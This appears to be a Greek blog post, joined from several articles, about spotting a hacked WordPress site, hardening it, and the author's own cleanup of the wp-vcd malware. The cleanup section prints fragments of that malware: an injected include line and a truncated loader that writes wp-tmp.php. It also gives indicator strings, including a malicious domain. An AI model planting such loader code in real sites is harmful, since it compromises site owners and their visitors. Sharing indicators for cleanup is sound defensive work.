Αν δεν χάκαραν το WordPress blog σου, αλλά θέλεις να αποφύγεις μελλοντικές δυσάρεστες εμπειρίες, τότε η καλύτερη συμβουλή που μπορώ να σου δώσω είναι: Κράτα backups (αντίγραφα ασφαλείας). Τα backups είναι ένα από τα πιο σημαντικά πράγματα που πρέπει να ελέγχεις και χωρίς αυτά δεν θα καταφέρεις να επιλύσεις το πρόβλημα γρήγορα και εύκολα. Αντίθετα, αν δεν έχεις κρατημένα πρόσφατα backups και οι hackers διαγράψουν οριστικά το περιεχόμενο σου ή σου ζητάνε χρήματα για να το επαναφέρουν, τότε θα δεις όλη τη δουλειά που έκανες να χάνεται στιγμιαία.

Πως να καταλάβεις αν χάκαραν το WordPress site σου

Να αναφέρω σε αυτό το σημείο πως υπάρχουν αρκετά malwares εκεί έξω που μπορούν να κρύψουν εύκολα τα ίχνη τους από τους διαχειριστές μιας WordPress ιστοσελίδας έως ότου θα είναι πολύ αργά. Κάποιοι μάλιστα είναι και ιδιαίτερα υπομονετικοί και χρησιμοποιούν την πρόσβαση που έχουν στην ιστοσελίδα ή τον server σου μόνο όποτε τους χρειάζεται. Σε αυτές τις περιπτώσεις, μόνο η σάρωση όλων των αρχείων με ένα αξιόπιστο defence πρόσθετο ή εργαλείο θα δείξουν τι πραγματικά συμβαίνει στην WordPress ιστοσελίδα σου.

Παρόλα αυτά, σε αρκετές περιπτώσεις ίσως δεις να συμβαίνει κάτι από τα παρακάτω:

Άλλαξε ο σχεδιασμός της ιστοσελίδας σου

Είναι αμέτρητες οι φορές που είδα τον σχεδιασμό μιας ιστοσελίδας να έχει αλλάξει είτε εντελώς, είτε ελάχιστα και σε συγκεκριμένα σημεία μετά από κάποιο χακάρισμα. Στις περισσότερες περιπτώσεις, είτε θα αλλάξει ολόκληρος ο σχεδιασμός και θα παρουσιάζεται μια landing σελίδα που προωθεί ή ενημερώνει για κάτι συγκεκριμένο, είτε αλλάζουν οι σύνδεσμοι σε διάφορα σημεία της ιστοσελίδας, όπως στο footer (διάβασε τις blogging ορολογίες εδώ).

Οι hackers προσθέτουν συνήθως συνδέσμους από διαφημιστικές ή κακόβουλες ιστοσελίδες που προσπαθούν να κατεβάσουν αρχεία για να μολύνουν τις συσκευές των επισκεπτών που θα τα κατεβάσουν. Άλλες φορές απλά εμφανίζουν μια landing σελίδα από την οποία είτε προσπαθούν να προωθήσουν κάτι συγκεκριμένο (και συχνά κακόβουλο), είτε να ψαρέψουν τους επισκέπτες ώστε να καταθέσουν χρήματα σε κάποιον λογαριασμό με τη χρήση Bitcoin. Άλλες φορές, απλά προσθέτουν λογαριασμούς για να καταθέσει ένα συγκεκριμένο ποσό ο ιδιοκτήτης της ιστοσελίδας για να του επαναφέρουν τα αρχεία και την πρόσβαση.

Δεν μπορείς να συνδεθείς ή μεταφέρεσαι σε τρίτη ιστοσελίδα

Για να σε αποτρέψουν απ’ το να κάνεις αλλαγές, οι hackers αρκετές φορές επιλέγουν να αλλάξουν όλα τα διαχειριστικά σου στοιχεία, συμπεριλαμβανομένων του email και του κωδικού πρόσβασης που χρησιμοποιείς. Αν προσπαθείς να συνδεθείς αλλά σου εμφανίζει το WordPress πως βάζεις λάθος στοιχεία και δεν μπορείς να ζητήσεις νέο κωδικό γιατί δεν υπάρχει άλλο το email που καταχωρείς, τότε πιθανότητα χάκαραν το WordPress site σου.

Σε άλλες περιπτώσεις (εξίσου συχνές) οι hackers επιλέγουν να δημιουργήσουν ένα auto-redirect (αυτόματη ανακατεύθυνση) ώστε να ανακατευθύνουν τους επισκέπτες της ιστοσελίδας σου σε μια διαφορετική και πιθανώς κακόβουλη. Αν η ιστοσελίδα σου μεταφέρει κάθε χρήστη σε διαφορετική ιστοσελίδα, τότε υπάρχει επίσης μεγάλη περίπτωση να ευθύνεται εδώ η hosting εταιρεία και τα κενά ασφάλειας που έχει στους servers της.

Αργή ιστοσελίδα και νέοι χρήστες με διαχειριστικά δικαιώματα

Αν ξεκίνησες να βλέπεις ξαφνικά να δημιουργούνται νέοι χρήστες με διαχειριστικά δικαιώματα στην ιστοσελίδα σου, τότε αυτό είναι ένα πολύ καλό σημάδι ότι χάκαραν το WordPress σου. Σε πολλές περιπτώσεις οι hackers θα δημιουργήσουν τους δικούς τους διαχειριστικούς λογαριασμούς ώστε να αποκτήσουν ευκολότερα πρόσβαση στον Πίνακα Ελέγχου του WordPress. Στη προκειμένη περίπτωση, θα λάβεις και emails από το WordPress στο email που έχεις βάλει ως προεπιλεγμένο στις Ρυθμίσεις της πλατφόρμας για τη δημιουργία νέων χρηστών.

Μπορεί επίσης να παρατηρείς ξαφνικά τεράστια καθυστέρηση στο άνοιγμα των σελίδων. Το ίδιο μπορεί να συμβαίνει και μέσα στο διαχειριστικό του WordPress, το οποίο δεν ανταποκρίνεται άλλο με την ίδια ταχύτητα. Αυτό συνήθως ευθύνεται λόγω των πασίγνωστων και συχνών DDoS επιθέσεων που γίνονται είτε σε μια μεμονωμένη ιστοσελίδα, είτε στους servers μιας hosting εταιρείας (όπου στην προκειμένη περίπτωση πέφτουν όλες οι ιστοσελίδες που φιλοξενούνται στον ίδιο server, ή καθυστερούν υπερβολικά στο φόρτωμα).

Ψεύτικες διαφημίσεις που οδηγούν σε κακόβουλες ιστοσελίδες

Μια φορά και ένα καιρό, απέκτησαν πρόσβαση σε όλα τα αρχεία του Inkstory. Κατάλαβα ότι υπήρχε πρόβλημα, όταν ένας αναγνώστης πάτησε πάνω σε μια διαφήμιση και τον μετέφερε σε μια κακόβουλη. Αφότου ενημερώθηκα, ξεκίνησα να ελέγχω τα αρχεία του WordPress, μόνο για να δω να έχει εισαχθεί σε αρκετά από αυτά κακόβουλος κώδικας (malware).

Οι hackers είχαν αλλάξει το 35% των διαφημίσεων της ιστοσελίδας με δικές τους, ενώ όσο ήμουν συνδεδεμένος ως διαχειριστής, έβλεπα το 00,0% των διαφημίσεων τους. Οι άτυχοι επισκέπτες μεταφερόντουσαν σε μια κακόβουλη ιστοσελίδα, απ’ την οποία αν καταχωρούσαν τα στοιχεία τους ή κατέβαζαν το κακόβουλο αρχείο, οι hackers αποκτούσαν πρόσβαση στις συσκευές τους.

Σε διαφορετικές καταστάσεις με χακαρισμένες ιστοσελίδες που αναλάμβανα, παρατήρησα πως εμφανιζόντουσαν παράλληλα και νέες διαφημίσεις. Αν οι hackers δεν ενδιαφερόντουσαν να δείξουν τα ίχνη τους ή ήταν αρχάριοι, συχνά άλλαζαν το 100% των διαφημίσεων και πρόσθεταν αναδυόμενα παράθυρα (pop-ups) με κακόβουλες διαφημίσεις. Φαντάζομαι πως αυτή είναι μια γρήγορη τακτική για να βγάλουν όσα πιο πολλά χρήματα μπορούν.

Τι να κάνεις αν χάκαραν το WordPress

Πρώτα απ’ όλα, πάρε ανάσες! Λίγο-πολύ, όλοι έχουμε βρεθεί σε αυτή τη δυσάρεστη κατάσταση όπου έχουν χακάρει την ιστοσελίδα μας. Υπάρχουν αρκετά πράγματα που μπορείς να κάνεις για να αποκτήσεις πρόσβαση στην ιστοσελίδα σου και να επαναφέρεις τα πάντα όπως ήταν πριν. Κάποιοι τρόποι είναι απλοί, ενώ άλλοι απαιτούν περεταίρω γνώσεις. Σε αυτό το άρθρο θα δούμε τα βασικά που μπορείς να κάνεις αν χάκαραν το WordPress site σου.

Μεταφορά ιστοσελίδας σε διαφορετική hosting εταιρεία

Αν η αιτία του προβλήματος είναι οι αδύναμοι και αναξιόπιστοι servers που χρησιμοποιεί η hosting εταιρεία που φιλοξενεί την ιστοσελίδα σου, τότε προτείνεται να μεταφερθείς όσο πιο άμεσα γίνεται – εναλλακτικά υπάρχει μεγάλη περίπτωση να ξανά εμφανιστούν προβλήματα και να ξανά χακάρουν το WordPress. Διάβασε τον προηγούμενο οδηγό για τη μεταφορά WordPress ιστοσελίδων σε άλλο server.

Μπορείς επίσης να διαβάσεις το review για την Hostinger και τις υπηρεσίες που παρέχει. Η εταιρεία όχι μόνο χρησιμοποιεί πανίσχυρους και ταχύτατους servers που τρέχουν με την τεχνολογία LiteSpeed, αλλά χρησιμοποιούν και ορισμένες από τις πιο εξελιγμένες και προσεγμένες τεχνολογίες για να διατηρούν τους servers τους ασφαλείς. Επιπλέον, αν συνδέσεις και την CloudFlare θα αποκτήσεις ακόμα μεγαλύτερη ασφάλεια.

Απαντήσεις στις πιο συχνές ερωτήσεις

Αν έχεις περισσότερες ερωτήσεις ή απορίες, μπορείς να αφήσεις το σχόλιο σου στο τέλος του άρθρου και ευχαρίστως να σε βοηθήσω.

Σύνοψη…

Είναι ιδιαίτερα δύσκολο να καθαρίσεις ένα WordPress site από ένα ισχυρό malware. Είναι επίσης δύσκολο να εντοπίσεις το backdoor απ’ το οποίο αποκτούν πρόσβαση οι hackers, αλλά και να σιγουρευτείς πως κάλυψες όλα τα κενά ασφάλειας από την ιστοσελίδα σου. Στις περισσότερες περιπτώσεις, η ιδανική λύση είναι να προσλάβεις έναν ειδικό, ο οποίος έχει όλες τις απαραίτητες γνώσεις για να ελέγξει και να επιλύσει το πρόβλημα.

Εσύ αντιμετώπισες ποτέ κάποιο hacking με την ιστοσελίδα σου; Και αν ναι, τι βήματα ακολούθησες; Αν συνεχίζεις να αντιμετωπίζεις προβλήματα, μπορείς να αφήσεις το σχόλιο σου στο τέλος του άρθρου και ευχαρίστως να σε βοηθήσω.

Δεν έχει ιδιαίτερη σημασία τι ιστοσελίδα έχεις. Είτε έχεις ένα blog, είτε μια στατική σελίδα, είτε ένα ηλεκτρονικό κατάστημα, υπάρχουν ορισμένα πράγματα που πρέπει να κάνεις για να διατηρείς την ασφάλεια του WordPress όσο πιο υψηλή γίνεται. Κανένας δεν θέλει άλλωστε να ξυπνήσει ένα χαρούμενο πρωινό μόνο για να δει την ιστοσελίδα του χακαρισμένη ή γεμάτη από malware.

Διάβασε επίσης: Δημιουργία WordPress blog (Οδηγός για αρχάριους)

Γιατί είναι σημαντικό να διατηρείς εσύ την ασφάλεια στο WordPress;

Αν και από μέρους τους οι web hosting εταιρείες παρέχουν έναν τοίχο ασφάλειας, στην περίπτωση όπου χακαριστεί η ιστοσελίδα σου ή δεχτεί επίθεση πάνω σε θέματα τα οποία αφορούν κακόβουλα plugins, κρακαρισμένα θέματα ή πρόσθετα, έλλειψη από ουσιώδης ενέργειες που θα έπρεπε να κάνεις νωρίτερα για να αποφύγεις τέτοιου είδους σκηνικά κ.ο.κ, δεν θα αναλάβει την ευθύνη. Αυτό σημαίνει πως θα χρειαστεί στη συνέχεια είτε να εντοπίσεις το πρόβλημα και να καθαρίσεις όλα τα χακαρισμένα αρχεία της ιστοσελίδας σου, είτε να προσλάβεις έναν προγραμματιστή, είτε να πληρώσεις την ίδια την hosting εταιρεία για να επαναφέρει την ιστοσελίδα σου.

Μεγάλα hacks μπορούν επίσης να διαγράψουν όλο το περιεχόμενο της ιστοσελίδας σου, να πάρουν τον πλήρη έλεγχο, να δημοσιεύουν δικά τους άρθρα ή ακόμα και να σου ζητάνε ένα χρηματικό ποσό σε Bitcoin για να σου παρέχουν και πάλι την πρόσβαση ή το περιεχόμενο που διέγραψαν. Για να αποφύγεις τέτοιες άτυχες περιπτώσεις, καλό είναι είναι να κάνεις μερικές μικρές αλλά βασικές αλλαγές ώστε να αυξήσεις αρκετά την ασφάλεια στο WordPress.

Την τελευταία δεκαετία έχω ασχοληθεί με αμέτρητες χακαρισμένες ιστοσελίδες και οι περισσότερες από αυτές θα μπορούσαν να είχαν γλιτώσει από πολύ χρόνο, κόπο και χρήμα, αν είχαν κάνει μόλις μερικές απλές αλλαγές στο WordPress τους. Δεν χρειάζεται να είσαι ειδικός για να αυξήσεις την ασφάλεια στο WordPress site σου και τα περισσότερα από τα παρακάτω μπορούν να γίνουν σε λίγα μόλις λεπτά.

Πως να αυξήσεις την ασφάλεια στο WordPress

Οι παραπάνω συμβουλές θα σε βοηθήσουν να αυξήσεις την ασφάλεια στο WordPress και να αποφύγεις τυχόν δυσάρεστες περιπέτειες με επιθέσεις και hacking. Στην περίπτωση που χρειαστείς βοήθεια με κάποιο από τα παραπάνω, μη διστάσεις να αφήσεις το σχόλιο σου στο τέλος του άρθρου και ευχαρίστως να σε βοηθήσω.

Προσέλαβε έναν προγραμματιστή

Ενώ υπάρχουν αρκετά πράγματα που μπορείς να κάνεις μόνος/νη σου για να αυξήσεις την ασφάλεια στο WordPress, μπορείς να φτάσεις έως ένα σημείο. Από εκεί και πέρα, ένας καλός προγραμματιστής θα αυξήσει ακόμα περισσότερη την ασφάλεια, τόσο μέσα από το WordPress, όσο και τον server που σε φιλοξενεί.

Αν έχεις ένα απλό blog, απλά φρόντιζε να κρατάς σε καθημερινή βάση αντίγραφα ασφαλείας. Αν παρόλα αυτά έχεις ένα πολύ μεγάλο blog, ένα ηλεκτρονικό κατάστημα ή μια ιστοσελίδα για την επιχείρηση σου, τότε ένας προγραμματιστής είναι απαραίτητος για να κάνει μια πρώτη βελτιστοποίηση της ασφάλειας, ελέγχοντας τα δικαιώματα στους φακέλους, τις ρυθμίσεις του WAF στον server, τον κώδικα, όλους τους φάκελους και τα αρχεία στην root τοποθεσία, τα plugins που έχεις εγκατεστημένα και αρκετά ακόμα.

Σύνοψη…

Πριν από αρκετά χρόνια, είχα μια ιστοσελίδα με αρκετούς χιλιάδες μηνιαίους αναγνώστες η οποία είχε χακαριστεί από μια ομάδα τούρκων harckers. Όταν μπήκα το πρωί για να γράψω άρθρο, είδα κάτι κινούμενα ανθρωπάκια να χορεύουν, μια αστεία μουσική να παίζει στο παρασκήνιο και στοιχεία με Bitcoin λογαριασμό για να τους πληρώσω. Φυσικά, κατάφερα να αποκτήσω και πάλι πρόσβαση στον server και να επαναφέρω την ιστοσελίδα, αλλά η διαδικασία ήταν χρονοβόρα και όπως καταλαβαίνεις, έβγαζε άσχημη εικόνα για την ασφάλεια της ιστοσελίδας.

Θα μπορούσα να αποφύγω εκείνη την επίθεση τότε, αν έκανα έστω και τα μισά από τα παραπάνω που έχω αναφέρει στην λίστα.

Εσύ ασχολήθηκες ποτέ με την ασφάλεια στο WordPress site σου; Πόσα από τα παραπάνω που αναφέρω στην λίστα έχεις κάνει και πόσα όχι; Σκέφτηκες ποτέ τι θα γινόταν σε μια δυσάρεστη περίπτωση επίθεσης;

Featured Image Credits: Michael Geiger στο Unsplash.

Η σημερινή μέρα ήταν ιδιαίτερα περιπετιώδης θα έλεγα. Όλα ξεκίνησαν όταν εγκατέστησα το Manjaro Linux και αποφάσισα να ρίξω μια ματιά στο Inkstory μέσω της Linux διανομής για να δω πως φαίνεται το blog με διαφορετική γραμματοσειρά. Με το που έκανα το πρώτο κλικ, κατευθείαν με μετέφερε σε διαφορετική ιστοσελίδα με διαφημίσεις. Προφανώς έμεινα με το στόμα ανοιχτό, καθώς όχι απλά το Linux δεν περιλαμβάνει ιούς, ήταν και νέα φρέσκια εγκατάσταση, οπότε ήμουν κατευθείαν σίγουρος πως το πρόβλημα ερχόταν από το Inkstory. Σε δευτερόλεπτα έκανα επανεκκίνηση το laptop, μπήκα με Windows, άνοιξα το Inkstory και δεν μου άνοιξε καμιά διαφήμιση, δεν με μετέφερε πουθενά και όλα φαινόντουσαν φυσιολογικά.

Προφανώς, εμπιστεύομαι το Linux πολύ περισσότερο απ’ ότι τα Windows, οπότε ήμουν σίγουρος πως κάτι περίεργο συνέβαινε. Ξανά μπήκα με Linux λοιπόν και ξανά τα ίδια, διαφημιστικές ιστοσελίδες παντού με το πρώτο κλικ που έκανα. Κατευθείαν ήξερα ότι πρόκειται για κάποιο malware το οποίο επηρέασε την ιστοσελίδα.

Για να μην χάνω χρόνο, εγκατέστησα κατευθείαν το Wordfence στο Inkstory και ξεκίνησα την πρώτη σάρωση της ιστοσελίδας. Το Wordfence γνωρίζω πως είναι ένα εξαιρετικό (αλλά ιδιαίτερα βαρύ) plugin το οποίο εμφανίζει όλα τα αρχεία του WordPress που είτε είναι περίεργα, είτε έχουν malware.

Η σάρωση κατευθείαν μου εμφάνισε ότι υπάρχει malware κώδικας μέσα σε διαφορετικά αρχεία, συμπεριλαμβανομένων και στο functions.php, το οποίο είναι το βασικό αρχείο για κάθε WordPress theme. Ο κώδικας μπήκε και σε άλλα αρχεία, όπως στο wp-feed.php και έφτιαξε και νέα αρχεία με ονομασίες όπως wp-tmp.php και wp-vcd.php.

Το πρόβλημα με το συγκεκριμένο malware δεν είναι το γεγονός πως κατάφερε να εισχωρήσει σε μια ιστοσελίδα, αλλά πως κρύβεται αρκετά καλά από τους διαχειριστές. Δεν μου πήρε πολύ ώρα για να καταλάβω πως είχα ένα πρόσφατο και καινούργιο malware το οποίο δεν εμφανιζόταν όσο ήμουν συνδεδεμένος ως διαχειριστής στο blog, παρά μόνο όταν έμπαινα σαν αναγνώστης και δεν με καταλάβαινε. Γι ‘αυτό και στα Windows τα έβλεπα όλα κανονικά, ενώ από Linux μου εμφάνιζε τις διαφημίσεις.

Ενημέρωση: Την ώρα που έγραφα το άρθρο, το ίδιο malware κόλλησε και μια πελάτισσα μου. Μίλησα επίσης και με άλλους bloggers και βρήκαν είχαν κολλήσει και αυτοί το συγκεκριμένο malware, ακόμα και άνθρωποι που φιλοξενούν τα blogs τους σε τεράστιες εταιρείες.

Τι είναι το wp-vcd Malware;

Το wp-vcd malware είναι ένα νέο είδος malware το οποίο στοχεύει ιστοσελίδες που τρέχουν στο WordPress και προσθέτει loopholes σε ανημέρωτα plugins και themes. Δημιουργεί επίσης backdoors προσθέτοντας νέους κρυφούς λογαριασμούς με διαχειριστικά δικαιώματα.

• Malware – Επικίνδυνος κώδικας που μπαίνει μέσα σε διάφορα αρχεία
• Loopholes – Λόγο κακής ασφάλειας από κάποιο plugin ή theme, επιτρέπουν σε malwares να εισχωρήσουν σε μια ιστοσελίδα.
• Backdoors – Επιτρέπουν στους hackers να μπουν ως διαχειριστές σε μια ιστοσελίδα και στα πιο σημαντικά της αρχεία.

Τι ακριβώς κάνει το wp-vcd Malware;

1. Το wp-vcd malware δημιουργεί spam URLs στην ιστοσελίδα (γνωστό και ως URL Injection).
2. Το malware δημιουργεί μια backdoor (πίσω πόρτα) η οποία επιτρέπει στους hackers να έχουν πρόσβαση στην ιστοσελίδα.
3. Οι hackers στη συνέχεια προσθέτουν περισσότερο malware σε διάφορα αρχεία του WordPress ώστε να σιγουρευτούν πως θα έχουν στάνταρ πρόσβαση.
4. Μόλις δημιουργήσουν αρκετά backdoors και loopholes, οι hackers προσθέτουν κακόβουλες διαφημίσεις στην ιστοσελίδα για να βγάλουν χρήματα.

Λόγοι για τους οποίους μια ιστοσελίδα κολλάει τον wp-vcd malware

Υπάρχουν αρκετοί τρόποι για να σε χακάρουν ή για να προσθέσουν malware στην ιστοσελίδα σου, αλλά το συγκεκριμένο malware συχνά εισχωρεί σε μια WordPress ιστοσελίδα εξαιτίας των παρακάτω λόγων:

1. Ο πιο συχνός λόγος είναι επειδή η ιστοσελίδα χρησιμοποιεί nulled κρακαρισμένα themes ή plugins. Στις περισσότερες περιπτώσεις, το wp-vcd malware υπάρχει προ-εγκατεστημένο μέσα στα nulled themes και plugins.
2. Η ιστοσελίδα σου έχει αρκετά ανημέρωτα plugins και themes. Ή ακόμα χειρότερα, όπως και στην δική μου περίπτωση, έχει plugins τα οποία αφαιρέθηκαν από τη βιβλιοθήκη του WordPress.org και σταμάτησαν να αναπτύσσονται από τους προγραμματιστές τους.
3. Δεν υπάρχει καλή ασφάλεια για να μπλοκάρει όλες τις φορές που προσπαθεί κάποιος να συνδεθεί στην ιστοσελίδα σου με διαφορετικούς τρόπους και τεχνικές.

Πως να καταλάβεις αν η ιστοσελίδα έχει το wp-vcd malware

Υπάρχουν αρκετοί τρόποι με τους οποίους μπορείς να καταλάβεις αν η ιστοσελίδα σου έχει το vcd-malware, αλλά έχε πάντα κατά νου πως ακόμα και τα malwares εξελίσσονται και γίνονται κάθε φορά και καλύτερα. Άλλωστε, το συγκεκριμένο malware κάποτε φαινόταν ακόμα και στους διαχειριστές, ενώ στην δική μου περίπτωση, ήταν αρκετά πιο έξυπνο.

1. Δημιουργήθηκε νέος χρήστης με διαχειριστικά δικαιώματα χωρίς να το γνωρίζεις.
2. Η web hosting εταιρεία στην οποία φιλοξενείς το blog σου, έχει κάνει suspended την ιστοσελίδα σου λόγο malware επίθεσης.
3. Υπάρχει άγνωστος JavaScript κώδικας σε διάφορα αρχεία του WordPress.
4. Διάφορες σελίδες του blog σου μεταφέρουν αυτόματα τους αναγνώστες σε κακόβουλες ή περίεργες ιστοσελίδες.
5. Υπάρχουν άγνωστα PHP αρχεία στο wp-includes φάκελο τα οποία δεν υπάρχουν στα αρχεία του WordPress στο GitHub.
6. Υπάρχουν άγνωστα PHP αρχεία στο wp-content/uploads και σε άλλους υποφακέλους.

Πως να αφαιρέσεις το wp-vcd malware από το WordPress

Πρώτα απ’ όλα, είναι πολύ σημαντικό να επικοινωνήσεις με έναν τεχνικό ή ειδικό επί του θέματος για να σιγουρευτεί σε ποια σημεία έχει εξαπλωθεί το malware και πόσα backdoors και loopholes υπάρχουν. Από μόνος σου, ωστόσο, μπορείς να ακολουθήσεις μια γρήγορη και εύκολη διαδικασία.

1. Αρχικά, εγκατέστησε το Wordfence plugin και ενεργοποίησε το.
2. Από το αριστερό μενού του WordPress, πάνε στο Wordfence και πάνε στην καρτέλα Scan.
3. Ξεκίνα ένα νέο scan και περίμενε έως ότου ολοκληρωθεί.
4. Μόλις ολοκληρωθεί το scan, θα σου εμφανίσει όλα τα αρχεία που έχουν είτε κακόβουλο κώδικα, είτε malware, είτε δεν ανήκουν στο WordPress.

Στην παρακάτω φωτογραφία, μπορείς να δεις τα αποτελέσματα από το πρώτο scan που έκανα με το Wordfence στο Inkstory. Τα πράγματα δεν είναι καθόλου καλά.

Εκτός από την τελευταία επιλογή, η οποία ουσιαστικά ήταν από ένα σχόλιο που υπήρχε στο blog με έναν κακόβουλο σύνδεσμο, όλα τα άλλα αρχεία περιλάμβαναν JavaScript και PHP κώδικα από το malware.

Βρήκα αρκετούς κώδικες σε διάφορα αρχεία, όπως ο παρακάτω ο οποίος υπήρχε στο functions.php αρχείο:

<?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?>

Ο παρακάτω βρέθηκε στο class.theme-modules.php το οποίο ουσιαστικά έκανε και την εγκατάσταση του wp-vcd malware μέσα σε όλα τα υπόλοιπα themes που υπήρχαν (ενεργοποιημένα και απενεργοποιημένα) και δημιούργησε όλα τα υπόλοιπα αρχεία:

<?php
 
//install_code1
error_reporting(0);
ini_set('display_errors', 0);
DEFINE('MAX_LEVEL', 2); 
DEFINE('MAX_ITERATION', 50); 
DEFINE('P', $_SERVER['DOCUMENT_ROOT']);

$GLOBALS['WP_CD_CODE'] = 'PD9waHANCmVycm9y...(base64-encoded string of PHP code)
...

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
 @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
 if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
 @file_put_contents('wp-tmp.php', $tmpcontent);
 }
 }

Για να “καθαρίσω” ολόκληρη την ιστοσελίδα από το malware έπρεπε ουσιαστικά να αφαιρέσω όλο τον κώδικα από κάθε αρχείο. Αλλά επειδή δεν είχα ούτε την όρεξη αλλά ούτε και τον χρόνο να κοιτάξω σε κάθε αρχείο για JavaScript κώδικα και για το που μπορεί να βρίσκεται το κάθε PHP αρχείο, τελικά χρησιμοποίησα το Wordfence και διέγραψα όλα τα αρχεία που μου εμφάνισε στο πρώτο scan.

Όταν όμως διαγράφηκαν τα αρχεία, το blog έμοιαζε έτσι:

Αυτό έγινε επειδή το Wordfence διέγραψε και το αρχείο functions.php του theme, στο οποίο φυσικά υπήρχε και ένα μικρό κομμάτι κώδικα από το malware. Το άφησα όμως έτσι και κατευθείαν προχώρησα στην πλήρη επανεγκατάσταση του WordPress. Αν υπήρχε κάποιο αρχείο που μου ξέφυγε, θα αντικαθιστόταν από την επανεγκατάσταση. Η επανεγκατάσταση του WordPress μπορεί να γίνει με δύο τρόπους:

1. Πηγαίνοντας Πίνακας Ελέγχου -> Ενημερώσεις -> Επανεγκατάσταση τώρα.
2. Κατεβάζεις το WordPress από το WordPress.org και ανεβάζεις όλα τα αρχεία στον server αντικαθιστόντας τα παλιά. Εδώ θέλει προσοχή βέβαια καθώς θα χρειαστεί να αλλάξεις από ορισμένα αρχεία τα στοιχεία για να μπορεί να συνδεθεί με την βάση δεδομένων.

Μόλις έκανα επανεγκατάσταση το WordPress, κατέβασα το theme, το ξανά ανέβασα και αντικατέστησα όλα τα αρχεία του. Το blog κατευθείαν έστρωσε και επανήλθε στον κανονικό του σχεδιασμό.

Έλεγξα στη συνέχεια αν υπήρχαν άλλα αρχεία επιρρεασμένα από το malware κάνοντας ξανά ένα scan με το Wordfence και ελέγχοντας με χειροκίνητο τρόπο τα πιο σημαντικά αρχεία του blog και του WordPress.

Το wp-vcd malware συχνά επηρεάζει τα παρακάτω αρχεία:

1. wp-includes/wp-vcd.php
2. wp-includes/wp-tmp.php
3. wp-content/themes/*/functions.php (όλα τα themes που υπάρχουν στον server, άσχετα αν είναι ενεργοποιημένα ή απενεργοποιημένα)
4. class.theme-modules.php
5. class.wp.php
6. admin.txt
7. codexc.txt
8. code1.php
9. class.theme-modules.php (μέσα στον φάκελο του theme)

Έλεγξε επίσης για string patterns:

1. tmpcontentx
2. function wp_temp_setupx
3. wp-tmp.php
4. derna.top/code.php
5. stripos($tmpcontent, $wp_auth_key)

Όταν σιγουρεύτηκα πως το malware έχει αφαιρεθεί εντελώς, άφησα το Wordfence να τρέχει και μέσα από το Plesk Control Panel έλεγξα επίσης την ασφάλεια της WordPress εγκατάστασης για να αποτρέψω την δημιουργία ή επεξεργασία ορισμένων βασικών αρχείων από τρίτους.

Προς το παρόν όλα φαίνονται μια χαρά, αλλά αν υπάρξει κάποια αλλαγή, θα ανανεώσω το άρθρο.

Ενημερώσεις άρθρου:

Φαίνεται πως οι περισσότερες ιστοσελίδες οι οποίες κόλλησαν το συγκεκριμένο malware ήταν εξαιτίας του Social Warfare, ένα αρκετά δημοφιλής WordPress plugin με πάνω από 70 χιλιάδες ενεργές εγκαταστάσεις. Είμαι ένας από τους top beta testers για το Social Warfare και ενημερώθηκα πως το πρόβλημα διορθώθηκε (οπότε αν το έχεις ενημέρωσε το οπωσδήποτε). Το Wordfence έβγαλε και ανακοίνωση στο επίσημο blog του για το συγκεκριμένο θέμα. Το Social Warfare διόρθωσε το πρόβλημα με νέα ενημέρωση μέσα σε μόλις μια ώρα.

Το δικό σου blog έχει κολλήσει ποτέ malware; Μήπως στο έχουν χακάρει ποτέ; Τι μέτρα έχεις πάρει για να σιγουρευτείς πως η ασφάλεια είναι όσο το δυνατόν πιο καλή γίνεται; Θα χαρώ να ακούσω τις απόψεις σου στα σχόλια παρακάτω.

Featured Image Credits: Φωτογραφία από Fatos Bytyqi στο Unsplash.